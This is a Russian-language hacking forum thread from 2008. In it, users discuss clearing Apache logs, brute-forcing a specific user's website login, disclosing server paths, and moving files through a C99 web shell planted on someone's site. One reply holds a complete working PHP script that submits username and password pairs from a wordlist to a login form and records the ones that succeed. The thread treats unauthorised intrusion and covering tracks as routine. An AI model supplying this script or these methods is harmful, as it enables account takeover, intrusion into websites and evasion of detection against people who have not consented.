08.11.2008, 14:17
|
|
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
С нами:
9443906
Репутация:
3313
|
|
Сообщение от diznt
_Pantera_ а по нормальному можно???
У тебя нет доступа к логам апача. Только если ты пользователь с максимальными правами(в линуксе - root), ты можешь их почистить. Хз где лежат в твоем случае. Скорей всего на уровень выше от корня www-дирректории.
Последний раз редактировалось ChaaK; 08.11.2008 в 14:20..
|
|
|
08.11.2008, 14:43
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
Есть отличные команды в никсах:
find и locate - вот и ищи логи.
А в Win серверах все еще проще,обычно они либо в logs,либо как писал ChaaK - на диру выше www.
Последний раз редактировалось $n@ke; 08.11.2008 в 14:49..
Причина: ошибочка
|
|
|
|
08.11.2008, 17:58
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
С нами:
9584577
Репутация:
69
|
|
Незнал где спросить, запостил сюда.
Нужно автоматически перебрать пароли по словарю на одном сайте через форму авторизации определенного пользователя Может кто-то подскажет способ, или подкинет скрипт?
|
|
|
|
08.11.2008, 19:54
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами:
10313606
Репутация:
1327
|
|
Сообщение от samarin
Незнал где спросить, запостил сюда.
Нужно автоматически перебрать пароли по словарю на одном сайте через форму авторизации определенного пользователя Может кто-то подскажет способ, или подкинет скрипт?
PHP код:
<?################Брутфорс Форм##################
///////////////////////----(c) nc.STRIEM----//////////////////////////
$filepas="file.txt" ; ///файл с данными для брута
$filegood="good.txt"; ///файл с подходящими паролями
$endifg=1; ///закончить при первом же найденом 1-да 0-нет
$iskl=array();
//////строки которых не должно быть в правельных страницах/////////
$iskl[0]="Неверный пароль";
//$iskl[1]="Неверная длина пароля!";
//$iskl[2]="ERROR";
//$iskl[3]="Ошибка";
//////////////////////////////////////////////////////////////////
$host="localhost"; ///хост
$script="/form.php"; ///скрипт
///////////////////////////////////////////////Передоваемый Header ///////////////////////////////////////////////////////
$header="POST http://$host$script HTTP/1.0\r\n";
$header.= "Host: $host\r\n";
$header.= "Content-Type: application/x-www-form-urlencoded\r\n";
//////Не обязательные параметры! но не всегда///
//$header.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n";
//$header.="Accept-Language: ru\r\n";
//$header.= "Proxy-Connection: Keep-Alive\r\n";
//$header.= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425))\r\n";
//$header.="Referer: http://microsoft.com\r\n";
//$header.="Cookie: CREATED=nc.STRIEM\r\n";
####################################Сам брут#####################################
set_time_limit(0);
$fo=fopen($filepas,"r");
$kolvoporolei=0;
$timestart=time('U');
$fgo=fopen($filegood,"a");
echo "<h3><center>Мы брутили http://$host$script</center></h3>";
while(!feof($fo))
{/////////////////////////////////////////////
$fp = fsockopen("www.".$host, 80, $errno, $errstr, 30);
if (!$fp)
echo "$errstr ($errno)<br />\n";
else
{
$kolvoporolei++;
$dan=rtrim(fgets($fo)); /////берем данные из файла
$dannii=split(';',$dan);
$out=$header;
$zapr="login=$dannii[0]&password=$dannii[1]"; ////имена переменных и их значения сюда
$contleng=strlen($zapr);
$out.= "Content-Length: $contleng\r\n";
$out.= "Pragma: no-cache\r\n\r\n";
$out.= "$zapr\r\n\r\n";
fwrite($fp, $out);
$conte="";
while (!feof($fp))
$conte.=fgets($fp);
$est=1;
for($i=0;$i<sizeof($iskl);$i++)
if(strstr($conte, $iskl[$i]))
{
$est=0;
break;
}
/////может понадобиться при настройки///
//echo htmlspecialchars($conte); break;
/////////////////////////////////
if($est)
{
fwrite($fgo,$dannii[0].";".$dannii[1]."\n");
echo "<h3><tt>Найдено:".$dannii[0].";".$dannii[1]."</tt></h3>";
if($endifg)
break;
}
fclose($fp);
}
}//////////////////////////////////////////////////////////////////////////////////////////
fclose($fgo);
$time=time('U')-$timestart;
echo "<h1><center>Закончено</center></h1><br><h3><tt>Проверенно $kolvoporolei вариантов, за $time секунд!</tt></h3><br><h4 align=center><center><tt>©*nc.STRIEM<br>nc.striem@mail.ru</tt></center></h4>";
?>
|
|
|
|
08.11.2008, 18:44
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
С нами:
9742875
Репутация:
81
|
|
2samarin
wwwhack прога старая но принципы досихпор не поменялись так что юзай если капчи нет или ограничения на количество попыток
если не найдешь могу скинуть на почту
|
|
|
|
08.11.2008, 19:32
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
С нами:
9584577
Репутация:
69
|
|
wwwhack с https не работает. Есть ли еще какие нибудь варианты?
|
|
|
|
08.11.2008, 20:50
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами:
9361870
Репутация:
58
|
|
как раскрыть пути в Zeus Web Server? ))
|
|
|
|
09.11.2008, 02:35
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
Всем здрасти....
Собственно сабж! Залил шелл(на сайт) и доступна тока командная строка виндувс, надо залить или стянуть какой либо файл! Когда пишу "ftp" в cmd то там просто пустая строка (не туда и не туда) вообщем я думаю не пашет команда(или я хз что).... Нужно стянуть файл (или залить) как это можно сделать (Ftp-глюки)
|
|
|
|
09.11.2008, 02:58
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами:
10198073
Репутация:
354
|
|
Только под своим ипом обязательно!!!!)
Какой шелл?
|
|
|
|
09.11.2008, 03:03
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
С99 madnet edition
штоле
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
